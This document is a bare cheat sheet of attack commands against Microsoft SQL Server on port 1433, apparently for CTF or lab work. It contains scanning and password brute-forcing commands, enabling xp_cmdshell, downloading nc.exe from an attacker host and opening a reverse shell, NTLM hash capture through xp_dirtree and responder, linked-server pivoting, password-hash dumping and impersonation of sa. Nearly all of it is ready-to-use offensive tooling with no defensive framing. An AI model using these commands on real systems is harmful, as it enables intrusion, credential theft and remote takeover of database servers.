1433 - MSSQL

nmap -sV -sC -p 1433 TARGET

impacket-mssqlclient user:password@TARGET
impacket-mssqlclient user:password@TARGET -windows-auth

sqsh -S TARGET -U user -P password

hydra -L users.txt -P passwords.txt mssql://TARGET
crackmapexec mssql TARGET -u users.txt -p passwords.txt

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'dir C:\';
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\flag.txt';

EXEC xp_cmdshell 'powershell -c "iwr http://ATTACKER_IP/nc.exe -OutFile C:\Windows\Temp\nc.exe"';
EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444';

SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;

EXEC xp_dirtree '\\ATTACKER_IP\share';

responder -I eth0

EXEC sp_linkedservers;
SELECT * FROM sys.servers;

EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER];

EXEC ('EXEC (''xp_cmdshell ''''whoami'''''') AT [SERVER_C]') AT [SERVER_B];

SELECT name FROM master.sys.databases;

SELECT * FROM information_schema.tables;

SELECT name, type_desc FROM sys.server_principals;

SELECT name, password_hash FROM sys.sql_logins;

-- Check who you can impersonate
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';

-- Impersonate
EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell 'whoami';